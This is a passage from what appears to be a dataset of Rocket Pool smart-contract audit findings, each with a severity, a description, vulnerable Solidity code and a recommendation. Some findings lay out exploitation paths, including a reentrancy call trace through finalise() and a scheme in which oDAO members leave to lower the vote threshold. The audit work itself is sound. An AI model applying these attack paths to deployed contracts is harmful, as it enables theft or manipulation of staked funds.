rETH contract\\n 
payable(rocketTokenRETH).transfer(address(this).balance);\\n }\\n // Trigger a deposit of excess collateral from rETH contract to deposit pool\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral();\\n // Unlock node operator's RPL\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress);\\n // Update unbonded validator count if minipool is unbonded\\n if (depositType == MinipoolDeposit.Empty) {\\n RocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\n rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress);\\n }\\n // Set finalised flag\\n finalised = true;\\n}\\n```\\n\\n```\\nfunction \\_refund() private {\\n // Update refund balance\\n uint256 refundAmount = nodeRefundBalance;\\n nodeRefundBalance = 0;\\n // Get node withdrawal address\\n address nodeWithdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n // Transfer refund amount\\n (bool success,) = nodeWithdrawalAddress.call{value : refundAmount}(\"\");\\n require(success, \"ETH refund amount was not successfully transferred to node operator\");\\n // Emit ether withdrawn event\\n emit EtherWithdrawn(nodeWithdrawalAddress, refundAmount, block.timestamp);\\n}\\n```\\n\\nMethods adjusting system settings called twice:\\n```\\n// Increments \\_nodeAddress' number of minipools that have been finalised\\nfunction incrementNodeFinalisedMinipoolCount(address \\_nodeAddress) override external onlyLatestContract(\"rocketMinipoolManager\", address(this)) onlyRegisteredMinipool(msg.sender) {\\n // Update the node specific count\\n addUint(keccak256(abi.encodePacked(\"node.minipools.finalised.count\", \\_nodeAddress)), 1);\\n // Update the total count\\n addUint(keccak256(bytes(\"minipools.finalised.count\")), 1);\\n}\\n```\\n\\n```\\n}\\nfunction decrementMemberUnbondedValidatorCount(address \\_nodeAddress) override external onlyLatestContract(\"rocketDAONodeTrusted\", 
address(this)) onlyRegisteredMinipool(msg.sender) {\\n subUint(keccak256(abi.encodePacked(daoNameSpace, \"member.validator.unbonded.count\", \\_nodeAddress)), 1);\\n}\\n```\\nчWe recommend setting the `finalised = true` flag immediately after checking for it. Additionally, the function flow should adhere to the checks-effects-interactions pattern whenever possible. We recommend adding generic reentrancy protection whenever the control flow is handed to an untrusted entity.��ч```\\nfinalise() --> \\n status == MinipoolStatus.Withdrawable //<-- true\\n withdrawalBlock > 0 //<-- true\\n _finalise() -->\\n !finalised //<-- true\\n _refund()\\n nodeRefundBalance = 0 //<-- reset refund balance\\n ---> extCall: nodeWithdrawalAddress\\n ---> reenter: finalise()\\n status == MinipoolStatus.Withdrawable //<-- true\\n withdrawalBlock > 0 //<-- true\\n _finalise() -->\\n !finalised //<-- true\\n nodeRefundBalance > 0 //<-- false; no refund()\\n address(this).balance to RETH\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral()\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress) //<-- 1st time\\n eventually call rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress); \\n finalised = true;\\n <--- return from reentrant call\\n <--- return from _refund()\\n address(this).balance to RETH //<-- NOP as balance was sent to RETH already\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral(); //<-- does not revert\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress); //<-- no revert, increases\\n 'node.minipools.finalised.count', 'minipools.finalised.count', reduces 'eth.matched.node.amount' one to\\n many times\\n eventually call rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress); //<-- manipulates\\n 'member.validator.unbonded.count' by +1\\n finalised = true; //<-- is already 'true', gracefully continues\\n<--- returns \\n```\\n -RocketMinipoolDelegate - Sandwiching of 
Minipool calls can have unintended side effectsчhighчThe `RocketMinipoolBase` contract exposes the functions `delegateUpgrade` and `delegateRollback`, allowing the minipool owner to switch between delegate implementations. While giving the minipool owner a chance to roll back potentially malfunctioning upgrades, the fact that upgrades and rollback are instantaneous also gives them a chance to alternate between executing old and new code (e.g. by utilizing callbacks) and sandwich user calls to the minipool.\\nAssuming the latest minipool delegate implementation, any user can call `RocketMinipoolDelegate.slash`, which slashes the node operator's RPL balance if a slashing has been recorded on their validator. To mark the minipool as having been `slashed`, the `slashed` contract variable is set to `true`. A minipool owner can avoid this flag from being set By sandwiching the user calls:\\nIn detail, the new slash implementation:\\n```\\nfunction \\_slash() private {\\n // Get contracts\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(\"rocketNodeStaking\"));\\n // Slash required amount and reset storage value\\n uint256 slashAmount = nodeSlashBalance;\\n nodeSlashBalance = 0;\\n rocketNodeStaking.slashRPL(nodeAddress, slashAmount);\\n // Record slashing\\n slashed = true;\\n}\\n```\\n\\nCompared to the old slash implementation:\\n```\\nfunction \\_slash() private {\\n // Get contracts\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(\"rocketNodeStaking\"));\\n // Slash required amount and reset storage value\\n uint256 slashAmount = nodeSlashBalance;\\n nodeSlashBalance = 0;\\n rocketNodeStaking.slashRPL(nodeAddress, slashAmount);\\n}\\n```\\n\\nWhile the bypass of `slashed` being set is a benign example, the effects of this issue, in general, could result in a significant disruption of minipool operations and potentially affect the system's funds. 
The impact highly depends on the changes introduced by future minipool upgrades.чWe recommend limiting upgrades and rollbacks to prevent minipool owners from switching implementations with an immediate effect. A time lock can fulfill this purpose when a minipool owner announces an upgrade to be done at a specific block. A warning can precede user-made calls that an upgrade is pending, and their interaction can have unintended side effects.чч```\\nfunction \\_slash() private {\\n // Get contracts\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(\"rocketNodeStaking\"));\\n // Slash required amount and reset storage value\\n uint256 slashAmount = nodeSlashBalance;\\n nodeSlashBalance = 0;\\n rocketNodeStaking.slashRPL(nodeAddress, slashAmount);\\n // Record slashing\\n slashed = true;\\n}\\n```\\n -RocketDAONodeTrustedActions - No way to access ETH provided by non-member votes AcknowledgedчhighчDAO members can challenge nodes to prove liveliness for free. Non-DAO members must provide `members.challenge.cost = 1 eth` to start a challenge. However, the provided challenge cost is locked within the contract instead of being returned or recycled as system collateral.\\n```\\n// In the event that the majority/all of members go offline permanently and no more proposals could be passed, a current member or a regular node can 'challenge' a DAO members node to respond\\n// If it does not respond in the given window, it can be removed as a member. The one who removes the member after the challenge isn't met, must be another node other than the proposer to provide some oversight\\n// This should only be used in an emergency situation to recover the DAO. 
Members that need removing when consensus is still viable, should be done via the 'kick' method.\\nfunction actionChallengeMake(address \\_nodeAddress) override external onlyTrustedNode(\\_nodeAddress) onlyRegisteredNode(msg.sender) onlyLatestContract(\"rocketDAONodeTrustedActions\", address(this)) payable {\\n // Load contracts\\n RocketDAONodeTrustedInterface rocketDAONode = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\n RocketDAONodeTrustedSettingsMembersInterface rocketDAONodeTrustedSettingsMembers = RocketDAONodeTrustedSettingsMembersInterface(getContractAddress(\"rocketDAONodeTrustedSettingsMembers\"));\\n // Members can challenge other members for free, but for a regular bonded node to challenge a DAO member, requires non-refundable payment to prevent spamming\\n if(rocketDAONode.getMemberIsValid(msg.sender) != true) require(msg.value == rocketDAONodeTrustedSettingsMembers.getChallengeCost(), \"Non DAO members must pay ETH to challenge a members node\");\\n // Can't challenge yourself duh\\n require(msg.sender != \\_nodeAddress, \"You cannot challenge yourself\");\\n // Is this member already being challenged?\\n```\\nчWe recommend locking the ETH inside the contract during the challenge process. If a challenge is refuted, we recommend feeding the locked value back into the system as protocol collateral. If the challenge succeeds and the node is kicked, it is assumed that the challenger will be repaid the amount they had to lock up to prove non-liveliness.чч```\\n// In the event that the majority/all of members go offline permanently and no more proposals could be passed, a current member or a regular node can 'challenge' a DAO members node to respond\\n// If it does not respond in the given window, it can be removed as a member. 
The one who removes the member after the challenge isn't met, must be another node other than the proposer to provide some oversight\\n// This should only be used in an emergency situation to recover the DAO. Members that need removing when consensus is still viable, should be done via the 'kick' method.\\nfunction actionChallengeMake(address \\_nodeAddress) override external onlyTrustedNode(\\_nodeAddress) onlyRegisteredNode(msg.sender) onlyLatestContract(\"rocketDAONodeTrustedActions\", address(this)) payable {\\n // Load contracts\\n RocketDAONodeTrustedInterface rocketDAONode = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\n RocketDAONodeTrustedSettingsMembersInterface rocketDAONodeTrustedSettingsMembers = RocketDAONodeTrustedSettingsMembersInterface(getContractAddress(\"rocketDAONodeTrustedSettingsMembers\"));\\n // Members can challenge other members for free, but for a regular bonded node to challenge a DAO member, requires non-refundable payment to prevent spamming\\n if(rocketDAONode.getMemberIsValid(msg.sender) != true) require(msg.value == rocketDAONodeTrustedSettingsMembers.getChallengeCost(), \"Non DAO members must pay ETH to challenge a members node\");\\n // Can't challenge yourself duh\\n require(msg.sender != \\_nodeAddress, \"You cannot challenge yourself\");\\n // Is this member already being challenged?\\n```\\n -Multiple checks-effects violationsчhighчThroughout the system, there are various violations of the checks-effects-interactions pattern where the contract state is updated after an external call. 
Since large parts of the Rocket Pool system's smart contracts are not guarded against reentrancy, the external call's recipient may reenter and potentially perform malicious actions that can impact the overall accounting and, thus, system funds.\\n`distributeToOwner()` sends the contract's balance to the node or the withdrawal address before clearing the internal accounting:\\n```\\n/// @notice Withdraw node balances from the minipool and close it. Only accepts calls from the owner\\nfunction close() override external onlyMinipoolOwner(msg.sender) onlyInitialised {\\n // Check current status\\n require(status == MinipoolStatus.Dissolved, \"The minipool can only be closed while dissolved\");\\n // Distribute funds to owner\\n distributeToOwner();\\n // Destroy minipool\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(\"rocketMinipoolManager\"));\\n require(rocketMinipoolManager.getMinipoolExists(address(this)), \"Minipool already closed\");\\n rocketMinipoolManager.destroyMinipool();\\n // Clear state\\n nodeDepositBalance = 0;\\n nodeRefundBalance = 0;\\n userDepositBalance = 0;\\n userDepositBalanceLegacy = 0;\\n userDepositAssignedTime = 0;\\n}\\n```\\n\\nThe withdrawal block should be set before any other contracts are called:\\n```\\n// Save block to prevent multiple withdrawals within a few blocks\\nwithdrawalBlock = block.number;\\n```\\n\\nThe `slashed` state should be set before any external calls are made:\\n```\\n/// @dev Slash node operator's RPL balance based on nodeSlashBalance\\nfunction \\_slash() private {\\n // Get contracts\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(\"rocketNodeStaking\"));\\n // Slash required amount and reset storage value\\n uint256 slashAmount = nodeSlashBalance;\\n nodeSlashBalance = 0;\\n rocketNodeStaking.slashRPL(nodeAddress, slashAmount);\\n // Record slashing\\n slashed = true;\\n}\\n```\\n\\nIn the bond 
reducer, the accounting values should be cleared before any external calls are made:\\n```\\n// Get desired to amount\\nuint256 newBondAmount = getUint(keccak256(abi.encodePacked(\"minipool.bond.reduction.value\", msg.sender)));\\nrequire(rocketNodeDeposit.isValidDepositAmount(newBondAmount), \"Invalid bond amount\");\\n// Calculate difference\\nuint256 existingBondAmount = minipool.getNodeDepositBalance();\\nuint256 delta = existingBondAmount.sub(newBondAmount);\\n// Get node address\\naddress nodeAddress = minipool.getNodeAddress();\\n// Increase ETH matched or revert if exceeds limit based on current RPL stake\\nrocketNodeDeposit.increaseEthMatched(nodeAddress, delta);\\n// Increase node operator's deposit credit\\nrocketNodeDeposit.increaseDepositCreditBalance(nodeAddress, delta);\\n// Clean up state\\ndeleteUint(keccak256(abi.encodePacked(\"minipool.bond.reduction.time\", msg.sender)));\\ndeleteUint(keccak256(abi.encodePacked(\"minipool.bond.reduction.value\", msg.sender)));\\n```\\n\\nThe counter for reward snapshot execution should be incremented before RPL gets minted:\\n```\\n// Execute inflation if required\\nrplContract.inflationMintTokens();\\n// Increment the reward index and update the claim interval timestamp\\nincrementRewardIndex();\\n```\\nчWe recommend following the checks-effects-interactions pattern and adjusting any contract state variables before making external calls. With the upgradeable nature of the system, we also recommend strictly adhering to this practice when all external calls are being made to trusted network contracts.чч```\\n/// @notice Withdraw node balances from the minipool and close it. 
Only accepts calls from the owner\\nfunction close() override external onlyMinipoolOwner(msg.sender) onlyInitialised {\\n // Check current status\\n require(status == MinipoolStatus.Dissolved, \"The minipool can only be closed while dissolved\");\\n // Distribute funds to owner\\n distributeToOwner();\\n // Destroy minipool\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(\"rocketMinipoolManager\"));\\n require(rocketMinipoolManager.getMinipoolExists(address(this)), \"Minipool already closed\");\\n rocketMinipoolManager.destroyMinipool();\\n // Clear state\\n nodeDepositBalance = 0;\\n nodeRefundBalance = 0;\\n userDepositBalance = 0;\\n userDepositBalanceLegacy = 0;\\n userDepositAssignedTime = 0;\\n}\\n```\\n -RocketMinipoolDelegate - Redundant refund() call on forced finalizationчmediumчThe `RocketMinipoolDelegate.refund` function will force finalization if a user previously distributed the pool. However, `_finalise` already calls `_refund()` if there is a node refund balance to transfer, making the additional call to `_refund()` in `refund()` obsolete.\\n```\\nfunction refund() override external onlyMinipoolOwnerOrWithdrawalAddress(msg.sender) onlyInitialised {\\n // Check refund balance\\n require(nodeRefundBalance > 0, \"No amount of the node deposit is available for refund\");\\n // If this minipool was distributed by a user, force finalisation on the node operator\\n if (!finalised && userDistributed) {\\n \\_finalise();\\n }\\n // Refund node\\n \\_refund();\\n}\\n```\\n\\n```\\nfunction \\_finalise() private {\\n // Get contracts\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(\"rocketMinipoolManager\"));\\n // Can only finalise the pool once\\n require(!finalised, \"Minipool has already been finalised\");\\n // Set finalised flag\\n finalised = true;\\n // If slash is required then perform it\\n if (nodeSlashBalance > 0) {\\n 
\\_slash();\\n }\\n // Refund node operator if required\\n if (nodeRefundBalance > 0) {\\n \\_refund();\\n }\\n```\\nчResolution\\nFixed in https://github.com/rocket-pool/rocketpool/tree/77d7cca65b7c0557cfda078a4fc45f9ac0cc6cc6 by refactoring `refund()` to avoid a double invocation of `_refund()` in the `_finalise()` codepath.\\nFixed per the recommendation. Thanks.\\nWe recommend refactoring the if condition to contain `_refund()` in the else branch.чч```\\nfunction refund() override external onlyMinipoolOwnerOrWithdrawalAddress(msg.sender) onlyInitialised {\\n // Check refund balance\\n require(nodeRefundBalance > 0, \"No amount of the node deposit is available for refund\");\\n // If this minipool was distributed by a user, force finalisation on the node operator\\n if (!finalised && userDistributed) {\\n \\_finalise();\\n }\\n // Refund node\\n \\_refund();\\n}\\n```\\n -Sparse documentation and accounting complexity AcknowledgedчmediumчThroughout the project, inline documentation is either sparse or missing altogether. Furthermore, few technical documents about the system's design rationale are available. The recent releases' increased complexity makes it significantly harder to trace the flow of funds through the system as components change semantics, are split into separate contracts, etc.\\nIt is essential that documentation not only outlines what is being done but also why and what a function's role in the system's “bigger picture” is. Many comments in the code base fail to fulfill this requirement and are thus redundant, e.g.\\n```\\n// Sanity check that refund balance is zero\\nrequire(nodeRefundBalance == 0, \"Refund balance not zero\");\\n```\\n\\n```\\n// Remove from vacant set\\nrocketMinipoolManager.removeVacantMinipool();\\n```\\n\\n```\\nif (ownerCalling) {\\n // Finalise the minipool if the owner is calling\\n \\_finalise();\\n```\\n\\nThe increased complexity and lack of documentation can increase the likelihood of developer error. 
Furthermore, the time spent maintaining the code and introducing new developers to the code base will drastically increase. This effect can be especially problematic in the system's accounting of funds as the various stages of a Minipool imply different flows of funds and interactions with external dependencies. Documentation should explain the rationale behind specific hardcoded values, such as the magic `8 ether` boundary for withdrawal detection. An example of a lack of documentation and distribution across components is the calculation and influence of `ethMatched` as it plays a role in:\\nthe minipool bond reducer,\\nthe node deposit contract,\\nthe node manager, and\\nthe node staking contract.чAs the Rocketpool system grows in complexity, we highly recommend significantly increasing the number of inline comments and general technical documentation and exploring ways to centralize the system's accounting further to provide a clear picture of which funds move where and at what point in time. Where the flow of funds is obscured because multiple components or multi-step processes are involved, we recommend adding extensive inline documentation to give context.чч```\\n// Sanity check that refund balance is zero\\nrequire(nodeRefundBalance == 0, \"Refund balance not zero\");\\n```\\n -RocketNodeDistributor - Missing extcodesize check in dynamic proxy Won't Fixчmediumч`RocketNodeDistributor` dynamically retrieves the currently set delegate from the centralized `RocketStorage` contract. The target contract (delegate) is resolved inside the fallback function. It may return `address(0)`. `rocketStorage.getAddress()` does not enforce that the requested settings key exists, which may lead to `RocketNodeDistributor` delegate-calling into `address(0)`, which returns no error. 
This might stay undetected when calling `RocketNodeDistributorDelegate.distribute()` as the method does not return a value, which is consistent with calling a target address with no code.\\n```\\nfallback() external payable {\\n address \\_target = rocketStorage.getAddress(distributorStorageKey);\\n assembly {\\n calldatacopy(0x0, 0x0, calldatasize())\\n let result := delegatecall(gas(), \\_target, 0x0, calldatasize(), 0x0, 0)\\n returndatacopy(0x0, 0x0, returndatasize())\\n switch result case 0 {revert(0, returndatasize())} default {return (0, returndatasize())}\\n }\\n}\\n```\\n\\n```\\nfunction getAddress(bytes32 \\_key) override external view returns (address r) {\\n return addressStorage[\\_key];\\n}\\n```\\nчBefore delegate-calling into the target contract, check if it exists.\\n```\\nassembly {\\n codeSize := extcodesize(\\_target)\\n}\\nrequire(codeSize > 0);\\n```\\nчч```\\nfallback() external payable {\\n address \\_target = rocketStorage.getAddress(distributorStorageKey);\\n assembly {\\n calldatacopy(0x0, 0x0, calldatasize())\\n let result := delegatecall(gas(), \\_target, 0x0, calldatasize(), 0x0, 0)\\n returndatacopy(0x0, 0x0, returndatasize())\\n switch result case 0 {revert(0, returndatasize())} default {return (0, returndatasize())}\\n }\\n}\\n```\\n -Kicked oDAO members' votes taken into account AcknowledgedчmediumчoDAO members can vote on proposals or submit external data to the system, acting as an oracle. Data submission is based on a vote by itself, and multiple oDAO members must submit the same data until a configurable threshold (51% by default) is reached for the data to be confirmed.\\nWhen a member gets kicked or leaves the oDAO after voting, their vote is still accounted for while the total number of oDAO members decreases.\\nA (group of) malicious oDAO actors may exploit this fact to artificially lower the consensus threshold by voting for a proposal and then leaving the oDAO. 
This will leave excess votes with the proposal while the total member count decreases.\\nFor example, let's assume there are 17 oDAO members. 9 members must vote for the proposal for it to pass (52.9%). Let's assume 8 members voted for, and the rest abstained and is against the proposal (47%, threshold not met). The proposal is unlikely to pass unless two malicious oDAO members leave the DAO, lowering the member count to 15 in an attempt to manipulate the vote, suddenly inflating vote power from 8/17 (47%; rejected) to 8/15 (53.3%; passed).\\nThe crux is that the votes of ex-oDAO members still count, while the quorum is based on the current oDAO member number.\\nHere are some examples, however, this is a general pattern used for oDAO votes in the system.\\nExample: RocketNetworkPrices\\nMembers submit votes via `submitPrices()`. If the threshold is reached, the proposal is executed. Quorum is based on the current oDAO member count, votes of ex-oDAO members are still accounted for. If a proposal is a near miss, malicious actors can force execute it by leaving the oDAO, lowering the threshold, and then calling `executeUpdatePrices()` to execute it.\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n // Update the price\\n updatePrices(\\_block, \\_rplPrice);\\n}\\n```\\n\\n```\\nfunction executeUpdatePrices(uint256 \\_block, uint256 \\_rplPrice) override external onlyLatestContract(\"rocketNetworkPrices\", address(this)) {\\n // Check settings\\n```\\n\\nRocketMinipoolBondReducer\\nThe `RocketMinipoolBondReducer` contract's `voteCancelReduction` function takes old votes of previously kicked oDAO members into account. 
This results in the vote being significantly higher and increases the potential for malicious actors, even after their removal, to sway the vote. Note that a canceled bond reduction cannot be undone.\\n```\\nRocketDAONodeTrustedSettingsMinipoolInterface rocketDAONodeTrustedSettingsMinipool = RocketDAONodeTrustedSettingsMinipoolInterface(getContractAddress(\"rocketDAONodeTrustedSettingsMinipool\"));\\nuint256 quorum = rocketDAONode.getMemberCount().mul(rocketDAONodeTrustedSettingsMinipool.getCancelBondReductionQuorum()).div(calcBase);\\nbytes32 totalCancelVotesKey = keccak256(abi.encodePacked(\"minipool.bond.reduction.vote.count\", \\_minipoolAddress));\\nuint256 totalCancelVotes = getUint(totalCancelVotesKey).add(1);\\nif (totalCancelVotes > quorum) {\\n```\\n\\nRocketNetworkPenalties\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodePenaltyThreshold()) {\\n setBool(executedKey, true);\\n incrementMinipoolPenaltyCount(\\_minipoolAddress);\\n}\\n```\\n\\n```\\n// Executes incrementMinipoolPenaltyCount if consensus threshold is reached\\nfunction executeUpdatePenalty(address \\_minipoolAddress, uint256 \\_block) override external onlyLatestContract(\"rocketNetworkPenalties\", address(this)) {\\n // Get contracts\\n RocketDAOProtocolSettingsNetworkInterface rocketDAOProtocolSettingsNetwork = RocketDAOProtocolSettingsNetworkInterface(getContractAddress(\"rocketDAOProtocolSettingsNetwork\"));\\n // Get submission keys\\n```\\nчTrack oDAO members' votes and remove them from the tally when the removal from the oDAO is executed.чч```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= 
rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n // Update the price\\n updatePrices(\\_block, \\_rplPrice);\\n}\\n```\\n -RocketDAOProtocolSettingsRewards - settings key collission AcknowledgedчmediumчA malicious user may craft a DAO protocol proposal to set a rewards claimer for a specific contract, thus overwriting another contract's settings. This issue arises due to lax requirements when choosing safe settings keys.\\n```\\nfunction setSettingRewardsClaimer(string memory \\_contractName, uint256 \\_perc) override public onlyDAOProtocolProposal {\\n // Get the total perc set, can't be more than 100\\n uint256 percTotal = getRewardsClaimersPercTotal();\\n // If this group already exists, it will update the perc\\n uint256 percTotalUpdate = percTotal.add(\\_perc).sub(getRewardsClaimerPerc(\\_contractName));\\n // Can't be more than a total claim amount of 100%\\n require(percTotalUpdate <= 1 ether, \"Claimers cannot total more than 100%\");\\n // Update the total\\n setUint(keccak256(abi.encodePacked(settingNameSpace,\"rewards.claims\", \"group.totalPerc\")), percTotalUpdate);\\n // Update/Add the claimer amount\\n setUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"group.amount\", \\_contractName)), \\_perc);\\n // Set the time it was updated at\\n setUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"group.amount.updated.time\", \\_contractName)), block.timestamp);\\n}\\n```\\n\\nThe method updates the rewards claimer for a specific contract by writing to the following two setting keys:\\n`settingNameSpace.rewards.claimsgroup.amount<_contractName>`\\n`settingNameSpace.rewards.claimsgroup.amount.updated.time<_contractName>`\\nDue to the way the settings hierarchy was chosen in this case, a malicious proposal might define a `<_contractName> = .updated.time` that overwrites the settings of a different contract with an invalid value.\\nNote that the issue of delimiter consistency is also discussed in 
issue 5.12.\\nThe severity rating is based on the fact that this should be detectable by DAO members. However, following a defense-in-depth approach means that such collisions should be avoided wherever possible.чWe recommend enforcing a unique prefix and delimiter when concatenating user-provided input to setting keys. In this specific case, the settings could be renamed as follows:\\n`settingNameSpace.rewards.claimsgroup.amount.value<_contractName>`\\n`settingNameSpace.rewards.claimsgroup.amount.updated.time<_contractName>`чч```\\nfunction setSettingRewardsClaimer(string memory \\_contractName, uint256 \\_perc) override public onlyDAOProtocolProposal {\\n // Get the total perc set, can't be more than 100\\n uint256 percTotal = getRewardsClaimersPercTotal();\\n // If this group already exists, it will update the perc\\n uint256 percTotalUpdate = percTotal.add(\\_perc).sub(getRewardsClaimerPerc(\\_contractName));\\n // Can't be more than a total claim amount of 100%\\n require(percTotalUpdate <= 1 ether, \"Claimers cannot total more than 100%\");\\n // Update the total\\n setUint(keccak256(abi.encodePacked(settingNameSpace,\"rewards.claims\", \"group.totalPerc\")), percTotalUpdate);\\n // Update/Add the claimer amount\\n setUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"group.amount\", \\_contractName)), \\_perc);\\n // Set the time it was updated at\\n setUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"group.amount.updated.time\", \\_contractName)), block.timestamp);\\n}\\n```\\n -RocketDAOProtocolSettingsRewards - missing setting delimiters AcknowledgedчmediumчSettings in the Rocket Pool system are hierarchical, and namespaces are prefixed using dot delimiters.\\nCalling `abi.encodePacked(, )` on strings performs a simple concatenation. According to the settings' naming scheme, it is suggested that the following example writes to a key named: `.rewards.claims.group.amount.<_contractName>`. 
However, due to missing delimiters, the actual key written to is: `.rewards.claimsgroup.amount<_contractName>`.\\nNote that there is no delimiter between `claims|group` and `amount|<_contractName>`.\\n```\\nfunction setSettingRewardsClaimer(string memory \\_contractName, uint256 \\_perc) override public onlyDAOProtocolProposal {\\n // Get the total perc set, can't be more than 100\\n uint256 percTotal = getRewardsClaimersPercTotal();\\n // If this group already exists, it will update the perc\\n uint256 percTotalUpdate = percTotal.add(\\_perc).sub(getRewardsClaimerPerc(\\_contractName));\\n // Can't be more than a total claim amount of 100%\\n require(percTotalUpdate <= 1 ether, \"Claimers cannot total more than 100%\");\\n // Update the total\\n setUint(keccak256(abi.encodePacked(settingNameSpace,\"rewards.claims\", \"group.totalPerc\")), percTotalUpdate);\\n // Update/Add the claimer amount\\n setUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"group.amount\", \\_contractName)), \\_perc);\\n // Set the time it was updated at\\n setUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"group.amount.updated.time\", \\_contractName)), block.timestamp);\\n}\\n```\\nчWe recommend adding the missing intermediate delimiters. 
The system should enforce delimiters after the last setting key before user input is concatenated to reduce the risk of accidental namespace collisions.чч```\\nfunction setSettingRewardsClaimer(string memory \\_contractName, uint256 \\_perc) override public onlyDAOProtocolProposal {\\n // Get the total perc set, can't be more than 100\\n uint256 percTotal = getRewardsClaimersPercTotal();\\n // If this group already exists, it will update the perc\\n uint256 percTotalUpdate = percTotal.add(\\_perc).sub(getRewardsClaimerPerc(\\_contractName));\\n // Can't be more than a total claim amount of 100%\\n require(percTotalUpdate <= 1 ether, \"Claimers cannot total more than 100%\");\\n // Update the total\\n setUint(keccak256(abi.encodePacked(settingNameSpace,\"rewards.claims\", \"group.totalPerc\")), percTotalUpdate);\\n // Update/Add the claimer amount\\n setUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"group.amount\", \\_contractName)), \\_perc);\\n // Set the time it was updated at\\n setUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"group.amount.updated.time\", \\_contractName)), block.timestamp);\\n}\\n```\\n -Use of address instead of specific contract types AcknowledgedчlowчRather than using a low-level `address` type and then casting to the safer contract type, it's better to use the best type available by default so the compiler can eventually check for type safety and contract existence and only downcast to less secure low-level types (address) when necessary.\\n`RocketStorageInterface _rocketStorage` should be declared in the arguments, removing the need to cast the address explicitly.\\n```\\n/// @notice Sets up starting delegate contract and then delegates initialisation to it\\nfunction initialise(address \\_rocketStorage, address \\_nodeAddress) external override notSelf {\\n // Check input\\n require(\\_nodeAddress != address(0), \"Invalid node address\");\\n require(storageState == StorageState.Undefined, 
\"Already initialised\");\\n // Set storage state to uninitialised\\n storageState = StorageState.Uninitialised;\\n // Set rocketStorage\\n rocketStorage = RocketStorageInterface(\\_rocketStorage);\\n```\\n\\n`RocketMinipoolInterface _minipoolAddress` should be declared in the arguments, removing the need to cast the address explicitly. Downcast to low-level address if needed. The event can be redeclared with the contract type.\\n```\\nfunction beginReduceBondAmount(address \\_minipoolAddress, uint256 \\_newBondAmount) override external onlyLatestContract(\"rocketMinipoolBondReducer\", address(this)) {\\n RocketMinipoolInterface minipool = RocketMinipoolInterface(\\_minipoolAddress);\\n```\\n\\n```\\n/// @notice Returns whether owner of given minipool can reduce bond amount given the waiting period constraint\\n/// @param \\_minipoolAddress Address of the minipool\\nfunction canReduceBondAmount(address \\_minipoolAddress) override public view returns (bool) {\\n RocketMinipoolInterface minipool = RocketMinipoolInterface(\\_minipoolAddress);\\n RocketDAONodeTrustedSettingsMinipoolInterface rocketDAONodeTrustedSettingsMinipool = RocketDAONodeTrustedSettingsMinipoolInterface(getContractAddress(\"rocketDAONodeTrustedSettingsMinipool\"));\\n uint256 reduceBondTime = getUint(keccak256(abi.encodePacked(\"minipool.bond.reduction.time\", \\_minipoolAddress)));\\n return rocketDAONodeTrustedSettingsMinipool.isWithinBondReductionWindow(block.timestamp.sub(reduceBondTime));\\n}\\n```\\n\\n```\\nfunction voteCancelReduction(address \\_minipoolAddress) override external onlyTrustedNode(msg.sender) onlyLatestContract(\"rocketMinipoolBondReducer\", address(this)) {\\n // Prevent calling if consensus has already been reached\\n require(!getReduceBondCancelled(\\_minipoolAddress), \"Already cancelled\");\\n // Get contracts\\n RocketMinipoolInterface minipool = RocketMinipoolInterface(\\_minipoolAddress);\\n```\\n\\nNote that `abi.encode*(contractType)` assumes `address` for 
